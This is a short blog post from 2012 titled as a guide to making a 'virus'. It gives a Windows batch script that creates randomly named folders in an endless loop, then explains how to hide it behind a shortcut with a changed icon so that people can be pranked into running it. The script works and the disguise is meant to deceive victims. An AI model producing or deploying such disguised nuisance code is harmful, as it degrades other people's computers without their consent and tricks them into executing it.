Friday 23 November 2012

How To make A virus That Will Make 1,000 Folders In Few Seconds

How To make A virus That Will Make 1,000 Folders In Few Seconds 

Step 1
Open notepad and type :

@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat

After that you will get icon that looks as show below

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

Step 3
Right click on icon and click Create Shortcut

Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon

No comments:

Post a Comment